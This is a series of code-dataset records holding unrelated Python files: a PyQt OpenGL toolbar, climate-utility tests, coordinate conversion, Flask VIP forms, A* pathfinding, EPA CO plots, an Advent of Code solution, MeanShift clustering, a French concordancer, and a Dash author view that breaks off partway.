\"images/application-exit.png\"), 'Quitter', self)\n exitAction.setShortcut('Ctrl+Q')\n exitAction.setStatusTip('Exit application')\n exitAction.triggered.connect(self.closeApp)\n fileMenu.addAction(exitAction)\n\n aboutAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" + \"images/help-browser.png\"), \"Aide\", self)\n aboutAction.setStatusTip(\"Aide pour cette application\")\n aboutAction.triggered.connect(self.displayHelp)\n helpMenu.addAction(aboutAction)\n\n aboutAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" + \"images/dialog-information.png\"), \"A propos\", self)\n aboutAction.setStatusTip(\"A propos de cette application\")\n aboutAction.triggered.connect(self.displayAbout)\n helpMenu.addAction(aboutAction)\n\n def reloadOpenGl(self):\n \"\"\" \"\"\"\n self._controller.reload()\n\n def addALight(self):\n \"\"\" \"\"\"\n self.l = AddLightPanel(self._controller)\n\n def algoOption(self):\n self.o = AlgoPanel(self._controller)\n\n def removeALight(self):\n \"\"\" \"\"\"\n self.l = RemoveLightPanel(self._controller)\n\n\n def animateLight(self):\n \"\"\" \"\"\"\n self._controller.switchLightAnimation()\n\n def animateCamera(self):\n \"\"\" \"\"\"\n self._controller.switchCameraAnimation()\n\n\n def showHardwareVersion(self):\n \"\"\" Display opengl and shading version\"\"\"\n helper = self._controller.getOpenGlVersionHelper()\n vendor = helper.getVendor()\n renderer = helper.getRenderer()\n shadingVersion = helper.getShadingVersion()\n openglVersion = helper.getOpenGlVersion()\n if isinstance(shadingVersion, str) and isinstance(openglVersion, str):\n QtGui.QMessageBox.information(self,\"Materiel graphique\",\"Vendeur : \" + vendor + \"\\n\" + \"Renderer : \" + renderer + \"\\n\" + \"OpenGL : \" + openglVersion + \"\\n\" + \"GLSL : \" + shadingVersion)\n else:\n print(\"GLShadow not initialized\")\n\n def onTypeSelection(self,lampe):\n \"\"\" \"\"\"\n self._controller.getLightCollection().setSelection((int(lampe[-1])-1))\n\n\n def initToolsBar(self):\n \"\"\" This method will initate the toolsBar\"\"\"\n self.toolbar = self.addToolBar(\"Tool Bar\")\n\n exitAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/application-exit.png\"), \"Exit\", self)\n exitAction.setShortcut(\"Ctrl+Q\")\n exitAction.setStatusTip(\"Quitter l'application\")\n exitAction.triggered.connect(self.closeApp)\n self.toolbar.addAction(exitAction)\n\n reloadAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/system-reload.png\"), \"Reload\", self)\n reloadAction.setShortcut(\"Ctrl+R\")\n reloadAction.setStatusTip(\"Recharge l'algorithme\")\n reloadAction.triggered.connect(self.reloadOpenGl)\n self.toolbar.addAction(reloadAction)\n\n self.toolbar.addSeparator()\n\n hardwareHelpAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/hwinfo.png\"), \"Montre la version du hardware graphique\", self)\n hardwareHelpAction.setStatusTip(\"Caractéristiques de la machine\")\n hardwareHelpAction.triggered.connect(self.showHardwareVersion)\n self.toolbar.addAction(hardwareHelpAction)\n\n\n self.toolbar.addSeparator()\n\n\n animationActionCamera = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/tool-animator-camera.png\"), \"Animation de la camera\", self)\n animationActionCamera.setStatusTip(\"Animation de la camera\")\n animationActionCamera.triggered.connect(self.animateCamera)\n self.toolbar.addAction(animationActionCamera)\n\n\n\n\n self.toolbar.addSeparator()\n\n addLightAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/lightBublePlus.png\"), \"Light+\", self)\n addLightAction.setStatusTip(\"Ajouter une lampe\")\n addLightAction.triggered.connect(self.addALight)\n self.toolbar.addAction(addLightAction)\n\n\n removeLightAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/lightBubleMinus.png\"), \"Light-\", self)\n removeLightAction.setStatusTip(\"Retirer une lampe\")\n removeLightAction.triggered.connect(self.removeALight)\n self.toolbar.addAction(removeLightAction)\n\n\n\n self.toolbar.addSeparator()\n self.toolbar.addSeparator()\n\n lightCollection = self._controller.getLightCollection()\n if len(lightCollection) > 0:\n self._choiceType = \"0 Default\"\n combo = QtGui.QComboBox(self)\n for lightIndex in range(len(lightCollection)):\n string = \"Lampe \"+ str(lightIndex+1)\n \n combo.addItem(string)\n combo.activated[str].connect(self.onTypeSelection)\n \n self.toolbar.addWidget(combo)\n\n self.toolbar.addSeparator()\n\n animationActionLight = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/tool-animator-light.png\"), \"Animation des lampes\", self)\n animationActionLight.setStatusTip(\"Animation des lampes\")\n animationActionLight.triggered.connect(self.animateLight)\n self.toolbar.addAction(animationActionLight)\n\n self.toolbar.addSeparator()\n\n\n textWidget = QtGui.QLabel(self)\n textWidget.setText(\"Position lumière : X \".decode(\"utf8\"))\n self.toolbar.addWidget(textWidget)\n\n\n sliderX = QtGui.QSlider(QtCore.Qt.Horizontal, self)\n sliderX.valueChanged.connect(self._controller.lightPercentX)\n sliderX.setSliderPosition(99)\n self.toolbar.addWidget(sliderX)\n\n\n textWidget = QtGui.QLabel(self)\n textWidget.setText(\" Z \")\n self.toolbar.addWidget(textWidget)\n\n sliderZ = QtGui.QSlider(QtCore.Qt.Horizontal, self)\n sliderZ.valueChanged.connect(self._controller.lightPercentZ)\n sliderZ.setSliderPosition(99)\n self.toolbar.addWidget(sliderZ)\n\n\n textWidget = QtGui.QLabel(self)\n textWidget.setText(\" Hauteur \")\n self.toolbar.addWidget(textWidget)\n\n sliderY = QtGui.QSlider(QtCore.Qt.Horizontal, self)\n sliderY.valueChanged.connect(self._controller.lightPercentY)\n sliderY.setSliderPosition(99)\n self.toolbar.addWidget(sliderY)\n\n\n self.toolbar.addSeparator()\n algoOptionAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/configure.png\"), \"Option algo\", self)\n algoOptionAction.setStatusTip(\"Options de l'algorithme\")\n algoOptionAction.triggered.connect(self.algoOption)\n self.toolbar.addAction(algoOptionAction)\n\n # un espace blanc\n textWidget = QtGui.QLabel(self)\n textWidget.setText(\" \"* 10)\n self.toolbar.addWidget(textWidget)\n\n\n def updateToolsBar(self):\n \"\"\" \"\"\"\n self.toolbar.hide()\n self.initToolsBar()\n \n \n","sub_path":"src/GUI/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":9250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"412111030","text":"from climt import (\n mass_to_volume_mixing_ratio,\n get_interface_values,\n calculate_q_sat)\n\nfrom sympl import DataArray\nimport numpy as np\nimport pytest\n\n\ndef test_mol_weight_not_passed():\n\n with pytest.raises(ValueError) as excinfo:\n mass_to_volume_mixing_ratio(None)\n\n assert 'molecular weight' in str(excinfo.value)\n\n\ndef test_for_365ppm():\n\n mass_mixing_ratio_co2 = 605e-6\n molecular_weight_co2 = 48\n\n expected_vol_mixing_ratio = 365.0670833333333e-6\n\n co2 = DataArray(\n mass_mixing_ratio_co2*np.ones((1, 1, 1)),\n dims=['longitude', 'latitude', 'mid_levels'],\n attrs=dict(units='g/g'))\n\n vol_mixing_ratio = mass_to_volume_mixing_ratio(\n co2, molecular_weight=molecular_weight_co2)\n\n assert np.all(np.isclose(\n vol_mixing_ratio, expected_vol_mixing_ratio))\n\n\ndef test_for_g_per_kg():\n\n mass_mixing_ratio_co2 = 605e-3\n molecular_weight_co2 = 48\n\n expected_vol_mixing_ratio = [[[365.0670833333333e-6]]]\n\n co2 = DataArray(\n mass_mixing_ratio_co2*np.ones((1, 1, 1)),\n dims=['longitude', 'latitude', 'mid_levels'],\n attrs=dict(units='g/kg'))\n\n vol_mixing_ratio = mass_to_volume_mixing_ratio(\n co2.to_units('g/g').values, molecular_weight=molecular_weight_co2)\n\n print(vol_mixing_ratio, expected_vol_mixing_ratio)\n assert np.all(np.isclose(\n vol_mixing_ratio, expected_vol_mixing_ratio))\n\n\ndef test_interface_levels():\n\n mid_level_values = np.ones((1, 1, 10))\n surface_value = np.ones((1, 1, 1))\n\n pressure_mid_level = np.linspace(0.995, 0.001, 10)[None, None, :]\n surface_pressure = 1.\n\n pressure_interface_level = np.zeros((1, 1, 11))\n\n pressure_interface_level[:, :, 1:-1] = (\n pressure_mid_level[:, :, 1::] + pressure_mid_level[:, :, :-1])/2.\n\n pressure_interface_level[:, :, 0] = surface_pressure\n pressure_interface_level[:, :, -1] = 0.0005\n\n interface_values = get_interface_values(\n mid_level_values, surface_value,\n pressure_mid_level, pressure_interface_level)\n\n assert np.all(interface_values == np.ones((1, 1, 11)))\n\n\ndef test_qsat():\n\n surf_temp = 290*np.random.randn(10, 10)\n surf_temp[surf_temp < 260] = 260\n surf_temp[surf_temp > 280] = 280\n\n qsat_at_280 = 0.0062856560708380816\n qsat_at_260 = 0.0012408979354134003\n\n surf_press = 1e5*np.ones(surf_temp.shape)\n\n Rd = 287.058 # J/kg/K\n Rv = 461.5 # J/kg/K\n\n qsat = calculate_q_sat(surf_temp, surf_press, Rd, Rv)\n\n assert np.all(qsat[surf_temp == 280] == qsat_at_280)\n assert np.all(qsat[surf_temp == 260] == qsat_at_260)\n\n\nif __name__ == '__main__':\n pytest.main([__file__])\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"246485476","text":"\"\"\"\nCoordinate conversions with the pyast Python package.\n\nhttps://github.com/timj/starlink-pyast\nhttp://dsberry.github.com/starlink/pyast.html\n\"\"\"\nimport numpy as np\nimport starlink.Ast as Ast\n\nSUPPORTED_SYSTEMS = 'fk5 fk4 icrs galactic ecliptic'.split()\n\ndef get_frame(system):\n \"\"\"Convert generic system specification tags to pyast.SkyFrame\"\"\"\n # Create a Frame to describe J2000 FK5 coordinates, and another that\n # will be used in turn to describe each of the output coordinate systems.\n # Assume that the epoch of observation is J2000.0. The default values for\n # the reference equinox will be used (J2000.0 for FK5 and ecliptic, and\n # B1950.0 for FK4).\n d = dict()\n d['fk5'] = 'FK5'\n d['fk4'] = 'FK4'\n d['galactic'] = 'Galactic'\n d['ecliptic'] = 'Ecliptic'\n d['icrs'] = 'ICRS'\n return Ast.SkyFrame('System=%s,Format(1)=hms.5,Format(2)=dms.5,Epoch=2000.0' % d[system])\n\ndef convert(coords, systems):\n \"\"\"Convert an array of in_coords from in_system to out_system\"\"\"\n\n if not set(systems.values()).issubset(SUPPORTED_SYSTEMS):\n return None\n\n in_frame, out_frame = get_frame(systems['in']), get_frame(systems['out'])\n frameset = in_frame.convert(out_frame)\n lon, lat = np.radians(coords['lon']), np.radians(coords['lat'])\n coords = frameset.tran([lon, lat])\n coords = np.degrees(coords.T)\n return dict(lon=coords[:,0], lat=coords[:,1])\n","sub_path":"tools/pyast/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"339276936","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n File name: vip.py\n Function Des: VIP表单\n ~~~~~~~~~~\n\n author: Jerry \n\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom flask_wtf import Form\nfrom wtforms import StringField, DateTimeField\nfrom wtforms.validators import DataRequired, Length, Regexp\nfrom mongoengine import Q\n\nfrom WebApp.main.models import VipUser\n\n\nclass VipAddForm(Form):\n username = StringField(\n '账号', validators=[\n DataRequired(message=\"账号不能为空\"),\n Length(min=3, max=5, message=\"账号长度必须在3-5之间\"),\n Regexp(r'^[a-z0-9A-Z]+$', message='仅可使用字母或数字'),\n ], description='输入账号',\n )\n\n name = StringField(\n '名字', validators=[\n DataRequired(message=\"昵称不能为空\"),\n Length(min=1, max=20, message=\"长度必须在1-20位之间\")\n ], description='输入姓名',\n )\n\n phone = StringField(\n '电话号码', validators=[\n DataRequired(message=\"电话不能为空\"),\n Length(min=6, max=15, message=\"长度必须在6-15位之间\")\n ], description='输入电话',\n )\n\n def save(self):\n vip = VipUser(\n username=self.username.data,\n name=self.name.data,\n phone=self.phone.data,\n )\n vip.save()\n return vip\n\n\nclass VipFilterForm(Form):\n name = StringField('名字')\n\n phone = StringField('电话号码')\n\n def filter(self):\n name = self.name.data\n phone = self.phone.data\n if not name and not phone:\n vips = VipUser.objects()\n elif not name:\n vips = VipUser.objects(phone=phone)\n elif not phone:\n vips = VipUser.objects(name=name)\n else:\n vips = VipUser.objects(Q(phone=phone) & Q(name=name))\n return vips\n\n\nclass VipRemoveForm(Form):\n username = StringField()\n\n def remove(self):\n vip = VipUser.objects(username=self.username.data)\n return vip.delete()\n\n\nclass VipModifyForm(Form):\n name = StringField(\n '名字', validators=[\n DataRequired(message=\"昵称不能为空\"),\n Length(min=1, max=20, message=\"长度必须在1-20位之间\")\n ], description='输入姓名',\n )\n\n phone = StringField(\n '电话号码', validators=[\n DataRequired(message=\"电话不能为空\"),\n Length(min=6, max=15, message=\"长度必须在6-15位之间\")\n ], description='输入电话',\n )\n username = StringField('账号') # 不能修改\n register_time = DateTimeField('注册时间') # 不能修改\n\n def modify(self):\n vip = VipUser.objects(username=self.username.data).first()\n if vip is None:\n raise ValueError('该会员已被删除')\n vip.update(\n name=self.name.data,\n phone=self.phone.data,\n )\n vip.save()\n","sub_path":"WebApp/main/forms/vip.py","file_name":"vip.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"519054677","text":"import math\n\nfrom collections import defaultdict\nfrom functools import partial\n\nfrom scripts.src.pathfinding.pathfinding_algorithm import PathfindingAlgorithm\nfrom scripts.src.pathfinding.path_not_found_exception import PathNotFoundException\nfrom scripts.src.pathfinding.tile_role import TileRole\nfrom scripts.src.pathfinding.config import NODE_SIZE\n\n\nclass AStar(PathfindingAlgorithm):\n \"\"\"https://en.wikipedia.org/wiki/A*_search_algorithm#Pseudocode\"\"\"\n def find_path(self, start, end):\n heuristic = partial(distance, point2=end.pixel_coordinates_center)\n openSet = {start}\n cameFrom = {}\n gScore = defaultdict(lambda: float('inf'))\n gScore[start] = 0\n\n fScore = defaultdict(lambda: float('inf'))\n fScore[start] = heuristic(start.pixel_coordinates_center)\n\n while openSet:\n openSet_fScores = {\n node: fScore[node] for node in openSet\n }\n\n current = min(openSet_fScores.items(), key=lambda x: x[1])[0]\n\n if distance(current.pixel_coordinates_center,\n end.pixel_coordinates_center) \\\n < NODE_SIZE:\n return reconstruct_path(cameFrom, current)\n\n openSet.remove(current)\n for neighbor, _ in current.neighbors:\n\n if neighbor.role is TileRole.EMPTY or \\\n neighbor.role is TileRole.END or \\\n neighbor.role is TileRole.START:\n tentative_gScore = gScore[current] + 1\n else:\n tentative_gScore = float('inf')\n\n if tentative_gScore < gScore[neighbor]:\n cameFrom[neighbor] = current\n gScore[neighbor] = tentative_gScore\n fScore[neighbor] = gScore[neighbor] + \\\n heuristic(neighbor.pixel_coordinates_center)\n if neighbor not in openSet:\n openSet.add(neighbor)\n\n raise PathNotFoundException()\n\n\ndef distance(point1, point2):\n x1, y1 = point1\n x2, y2 = point2\n return math.sqrt(pow(x2-x1, 2) + pow(y2-y1, 2))\n\n\ndef reconstruct_path(cameFrom, current):\n total_path = [current]\n while current in cameFrom.keys():\n current = cameFrom[current]\n total_path.append(current)\n return total_path[::-1]\n","sub_path":"scripts/src/pathfinding/a_star.py","file_name":"a_star.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"337595452","text":"__author__ = 'Ben'\nimport pandas as pd\nimport numpy as np\nfrom pandas import DataFrame\nimport datetime\nimport pandas.io.data\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib.pyplot import text\nfrom numpy import arange\n#import geopandas.geoseries as gp\n\n\nmatplotlib.style.use('ggplot')\n\n\nimport glob\n\n\npath='C:\\Rdcep Github\\Ben Git Stuff\\DataFilesPM2'\npath2 ='C:\\Rdcep Github\\EPADataFiles\\DataFilesPM2.csv'\n\nallFiles = glob.glob(path + \"/*.csv\")\nlist=[]\ninteger=0\nfor file in allFiles:\n if integer<=50:\n\n df = pd.read_csv(file)# index_col=0)# header=0,)#parse_dates=['Date'])\n list.append(df)\n integer+=1\n frame=pd.concat(list)\n frame['Type']=['Air-PM2']*len(frame.index)\n frame.to_csv(path=path2)\n\n #df2=gp.from_file()\n df = pd.read_csv(file)# index_col=0)# header=0,)#parse_dates=['Date'])\n print(df.index)\n list.append(df)\n integer+=1\n\n\n\n\nfor frame in list:\n year=frame['Date'][5][-4:]\n plt.ylim([0, .2])\n frame=frame.sort_index(by=['Date'], ascending=[True])\n frame.plot(label=\"Measured CO Level\", y='Daily Max 8-hour CO Concentration', x='Date')\n plt.title(\"Daily Carbon Monoxide Levels for Year {0}\".format(str(year))+\" in Cook County, IL\")\n plt.xlabel('Date')\n plt.ylabel('CO Concentration in Air Close to Surface (ppm)')\n plt.yticks(arange(0,20,1))\n plt.axhline(y=15, xmin=0, xmax=1, linewidth=2, color = 'b',label='Dangerous CO Level')\n plt.legend()\nplt.show()\n\n","sub_path":"2015 Rdcep Intern Ben EPA/CO/COEveryYearSeperate.py","file_name":"COEveryYearSeperate.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"62994454","text":"from collections import Counter\n\ndata = []\n\ndef yy():\n return open('input.txt')\ndef xx():\n return filter(None, \"\"\"\nbe cfbegad cbdgef fgaecd cgeb fdcge agebfd fecdb fabcd edb | fdgacbe cefdb cefbgd gcbe\nedbfga begcd cbg gc gcadebf fbgde acbgfd abcde gfcbed gfec | fcgedb cgb dgebacf gc\nfgaebd cg bdaec gdafb agbcfd gdcbef bgcad gfac gcb cdgabef | cg cg fdcagb cbg\nfbegcd cbd adcefb dageb afcb bc aefdc ecdab fgdeca fcdbega | efabcd cedba gadfec cb\naecbfdg fbg gf bafeg dbefa fcge gcbea fcaegb dgceab fcbdga | gecf egdcabf bgf bfgea\nfgeab ca afcebg bdacfeg cfaedg gcfdb baec bfadeg bafgc acf | gebdcfa ecba ca fadegcb\ndbcfg fgd bdegcaf fgec aegbdf ecdfab fbedc dacgb gdcebf gf | cefg dcbef fcge gbcadfe\nbdfegc cbegaf gecbf dfcage bdacg ed bedf ced adcbefg gebcd | ed bcgafe cdgba cbgef\negadfb cdbfeg cegd fecab cgb gbdefca cg fgcdab egfdb bfceg | gbdfcae bgc cg cgb\ngcafb gcf dcaebfg ecagb gf abcdeg gaef cafbge fdbac fegbdc | fgae cfgab fg bagce\n\"\"\".splitlines())\n\nfor line in yy():\n all_digits, four_display = line.split(' | ')\n all_digits = sorted([''.join(sorted(x)) for x in all_digits.split()], key=lambda x: (len(x), x))\n four_display = [''.join(sorted(d)) for d in four_display.split()]\n data.append((all_digits, four_display))\n\nSEGMENTS = {\n 0: 6,\n 1: 2,\n 2: 5,\n 3: 5,\n 4: 4,\n 5: 5,\n 6: 6,\n 7: 3,\n 8: 7,\n 9: 6,\n}\n\nSIZE = {\n 2: (1, ),\n 3: (7, ),\n 4: (4, ),\n 5: (2, 3, 5, ),\n 6: (0, 6, 9),\n 7: (8, )\n}\n\nUNIQUE_SIZE = {\n 2: 1,\n 3: 7,\n 4: 4,\n 7: 8,\n}\n\nNORMAL_OUTPUT = {\n 'cf': 1,\n \"acf\": 7,\n 'bcdf': 4,\n 'acdeg': 2,\n 'abdfg': 5,\n 'acdfg': 3,\n 'abcefg': 0,\n 'abdefg': 6,\n 'abcdfg': 9,\n 'abcdefg': 8,\n}\nALL_SEGMENTS = 'abcdefg'\n\nd = Counter()\nfor _, output_value in data:\n for digit in output_value:\n d[SIZE[len(digit)]] += 1\nprint(d[(1, )] + d[(7, )] + d[(4, )] + d[(8, )])\n\n\ndef make_code(digits):\n output_map = {}\n\n mapped_digits = {\n UNIQUE_SIZE[len(d)]: d\n for d in digits\n if len(d) in UNIQUE_SIZE\n }\n\n counter = Counter()\n\n for d in digits:\n counter.update(d)\n \n for key, value in counter.items():\n if value == 4:\n output_map[key] = 'e'\n if value == 6:\n output_map[key] = 'b'\n if value == 9:\n output_map[key] = 'f'\n\n one = mapped_digits[1]\n four = mapped_digits[4]\n seven = mapped_digits[7]\n eight = mapped_digits[8]\n \n cee = ''.join(x for x in one if output_map.get(x) != 'f')\n assert len(cee) == 1\n output_map[cee] = 'c'\n \n dee = ''.join(\n l for l in four if output_map.get(l) not in (\n 'f',\n 'b',\n 'c'\n )\n )\n assert len(dee) == 1\n output_map[dee] = 'd'\n \n aaa = ''.join(\n l for l in seven\n if output_map.get(l) not in ('c', 'f')\n )\n assert len(aaa) == 1\n output_map[aaa] = 'a'\n \n last_one = (set(ALL_SEGMENTS) - set(output_map))\n last_target = (set(ALL_SEGMENTS) - set(output_map.values()))\n assert len(last_one) == len(last_target) == 1\n output_map[last_one.pop()] = last_target.pop()\n \n code = {}\n for input_d in digits:\n code[input_d] = ''.join(sorted(output_map[x] for x in input_d))\n assert set(code.values()) == set(NORMAL_OUTPUT.keys())\n \n return code\n \n\nr = 0\nfor digits, output_value in data:\n code = make_code(digits)\n integer_digits = ''.join(str(NORMAL_OUTPUT[code[d]]) for d in output_value)\n print(integer_digits.lstrip('0'))\n r += int(integer_digits.lstrip('0'))\n\nprint(r)\n","sub_path":"2021/day8/day.py","file_name":"day.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"3555927","text":"import numpy as np\r\nimport pandas as pd\r\nfrom sklearn.cluster import MeanShift\r\nfrom sklearn.datasets import make_blobs\r\nfrom matplotlib import pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom sklearn import datasets\r\nfrom dbconn import *\r\nimport json\r\n\r\nfeatures = \"sport foot stade football athletisme basketball natation cyclisme golf handball equitation judo karate marathon rugby ski taekwondo volleyball superbowl match coupe championnat attentat tremblement concert exposition explosion festival terroriste election fete cirque gala oscar cesar congre forum ceremoni convention spectacle theatr politique trianon vote election accident mort sortie album cinema film coronaviru viru maladie epidemie pandemie nouveau solde carnaval france europe monde national regionnal zenith olympia bataclan hippodrome cinema\"\r\nF = features.split(\" \")\r\n\r\ndico={}\r\n \r\n \r\nselectVectors = selectVectors()\r\nV = []\r\nfor row in selectVectors:\r\n r=row[1].split(\"ARRAY\")\r\n res = json.loads(r[1])\r\n V.append(res)\r\n\r\nv = 0\r\ni = 0\r\n\r\nfor vector in V :\r\n for feature in vector :\r\n if feature == 1 :\r\n \r\n if v in dico :\r\n dico[v] += F[i] + \" \"\r\n else :\r\n dico[v] = F[i] + \" \"\r\n i+=1\r\n v+=1\r\n i=0\r\nprint(v)\r\n\r\nX = np.array(V)\r\n\r\nms = MeanShift()\r\nms.fit(X)\r\nlabels = ms.labels_\r\ncluster_centers = ms.cluster_centers_\r\n\r\nl = list(labels)\r\n\r\nfor i in range(len(l)) :\r\n print(l[i],dico[l[i]])\r\n\r\n\"\"\"\r\nfig = plt.figure()\r\nax = fig.add_subplot(111, projection='3d')\r\nax.scatter(X[:,0], X[:,1], X[:,2], marker='o')\r\nax.scatter(cluster_centers[:,0], cluster_centers[:,1], cluster_centers[:,2], marker='x', color='red', s=300, linewidth=5, zorder=10)\r\nplt.show()\r\n\r\n\r\n##plt.scatter(X[:,0], X[:,1], s=150)\r\n##plt.show()\r\n\r\ncolors = 10*[\"g\",\"r\",\"c\",\"b\",\"k\"]\r\n\r\nclass Mean_Shift:\r\n def __init__(self, radius=4):\r\n self.radius = radius\r\n\r\n def fit(self, data):\r\n centroids = {}\r\n\r\n for i in range(len(data)):\r\n centroids[i] = data[i]\r\n \r\n while True:\r\n new_centroids = []\r\n for i in centroids:\r\n in_bandwidth = []\r\n centroid = centroids[i]\r\n for featureset in data:\r\n if np.linalg.norm(featureset-centroid) < self.radius:\r\n in_bandwidth.append(featureset)\r\n\r\n new_centroid = np.average(in_bandwidth,axis=0)\r\n new_centroids.append(tuple(new_centroid))\r\n\r\n uniques = sorted(list(set(new_centroids)))\r\n\r\n prev_centroids = dict(centroids)\r\n\r\n centroids = {}\r\n for i in range(len(uniques)):\r\n centroids[i] = np.array(uniques[i])\r\n\r\n optimized = True\r\n\r\n for i in centroids:\r\n if not np.array_equal(centroids[i], prev_centroids[i]):\r\n optimized = False\r\n if not optimized:\r\n break\r\n \r\n if optimized:\r\n break\r\n\r\n self.centroids = centroids\r\n\r\n\r\n\r\nclf = Mean_Shift()\r\nclf.fit(X)\r\n\r\ncentroids = clf.centroids\r\n\r\nplt.scatter(X[:,0], X[:,1], s=150)\r\n\r\nfor c in centroids:\r\n plt.scatter(centroids[c][0], centroids[c][1], color='k', marker='*', s=150)\r\n\r\nplt.show()\r\n\"\"\"\r\n","sub_path":"WebSensor/project/ms.py","file_name":"ms.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"155549737","text":"import json\nimport re\nimport os\nimport codecs\n\ndef write_json(dic, filename, encoding):\n dicjson=json.dumps(dic,indent=2)\n f = codecs.open(filename,\"w\",\"utf-8\")\n f.write(dicjson)\n f.close()\n\ndef separation(fichier):\n mots_uniques=[] # list de mots uniques\n f = open(\"fr/appr/\"+fichier,'r',encoding=\"utf8\")\n i=0 # id de ligne \n for ligne in f:\n #print(\"ligne \"+str(i)) \n ligne=ligne.strip() # supprimer \\n \\r et spaces en fin de ligne \n if len(ligne)==0 or ligne.isspace(): # si le ligne est vide \"\" ou si le ligne contienne sauf des espaces \n continue \n mots=ligne.split() # liste de mots dans le ligne\n for mot in mots:\n mot=mot.lower() # transformer en miniscule\n if mot not in mots_uniques:\n mot=re.sub(\"\\(\",\"\",mot)\n mot=re.sub(\"\\)\",\"\",mot)\n mot=re.sub(\"\\*\",\"\",mot)\n mot=re.sub(\"\\[\",\"\",mot)\n mot=re.sub(\"\\]\",\"\",mot)\n mot=re.sub(\"\\+\",\"\",mot)\n mot=re.sub(\"\\-\",\"\",mot)\n mot=re.sub(\"\\n\",\"\",mot)\n mots_uniques+=[mot]\n i+=1 \n return mots_uniques\n\ndef concordation(nombre):\n d={}\n liste_fichier=os.listdir('fr/appr')\n for fichier in liste_fichier:\n liste_mot=separation(fichier)\n f=open(\"fr/appr/\"+fichier,\"r\",encoding=\"utf8\")\n texte_fichier=f.read()\n f.close()\n for mot in liste_mot:\n liste_index_mot=indexation(mot,fichier)\n\n for index in liste_index_mot:\n d[mot]={fichier:[texte_fichier[index[0]-nombre:index[0]],texte_fichier[index[1]:index[1]+nombre]] }\n return d \n \n \n \ndef indexation(mot,fichier):\n liste_index=[]\n f=open(\"fr/appr/\"+fichier,\"r\",encoding=\"utf8\")\n texte=f.read()\n for a in re.finditer(mot,texte):\n liste_index.append((a.start(),a.end(),mot))\n f.close()\n return liste_index\n \n#EXERCICE 2\n \n \ndef affichage(dico):\n for mot in dico:\n for fichier in dico[mot]:\n print(dico[mot][fichier][0]+'\\t'+mot+'\\t'+dico[mot][fichier][1])\n \n\n\n\nif __name__==\"__main__\":\n f=open(\"dico\",\"r\",encoding=\"utf8\")\n dicojson=json.load(f)\n affichage(dicojson)\n f.close()\n \n \n\n\n\n###EXEMPLE D'AIDE\n##\n##f = open(\"fr/appr/2009-01-14_celex_IP-09-48.fr.html\",'r')\n###for a in re.finditer(\"premier\",f.read()):\n### print (a.start(),a.end())\n##\n##print(f.read()[20:38])\n##f.close()\n","sub_path":"L2/Semestre 3/Traitement automatique des langues/TP6 concordancier/tp6_mekhelef_bensitel.py","file_name":"tp6_mekhelef_bensitel.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"329563527","text":"# Python Standard Libraries\n#\n# External Libraries\nimport dash_table\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objects as go\nimport pandas as pd\n# Components\n# Model\nfrom system.components.model.author import get_author_data_db, get_papers_by_author_db\n# Controller \nfrom system.components.controller.nlp_tools import topic_modelling, common_words, common_bigrams, common_speech_tagging\n# Get plot author\ndef get_plot_author(name):\n author = get_author_data_db(name)\n idx = author[0]\n name = author[1]\n affiliation = author[2]\n citedby = author[3]\n cites_by_year = eval(author[4])\n email = author[5]\n url_picture = author[6]\n if url_picture == \"URL picture not available\":\n url_picture = \"./assets/user-empty.png\"\n interests = author[7] \n # Figure cites by year\n x = list(cites_by_year.keys())\n y = list(cites_by_year.values())\n fig_cites_year = go.Figure(go.Bar(x=x, y=y))\n fig_cites_year.update_layout(margin=dict(l=0, r=0, t=5, b=0), xaxis_title=\"Year\", yaxis_title=\"Cites\")\n # Get papers by author\n papers = get_papers_by_author_db(idx)\n # Papers datatable\n df_papers = pd.DataFrame(papers)\n df_papers.columns = [\"ID\", \"Title\", \"Abstract\", \"Authors\", \"Year\", \"Cites\", \"Journal\", \"Publisher\", \"j\", \"z\"]\n df_papers = df_papers.drop([\"j\", \"z\"], axis=1)\n table = dash_table.DataTable(\n id=\"table\",\n style_table={\n 'overflowY': 'auto',\n 'overflowX': 'auto',\n 'height': \"75vh\"\n },\n tooltip_data=[\n {\n column: {'value': str(value)}\n for column, value in row.items()\n } for row in df_papers.to_dict('rows')\n ],\n tooltip_duration=None,\n style_cell={\n 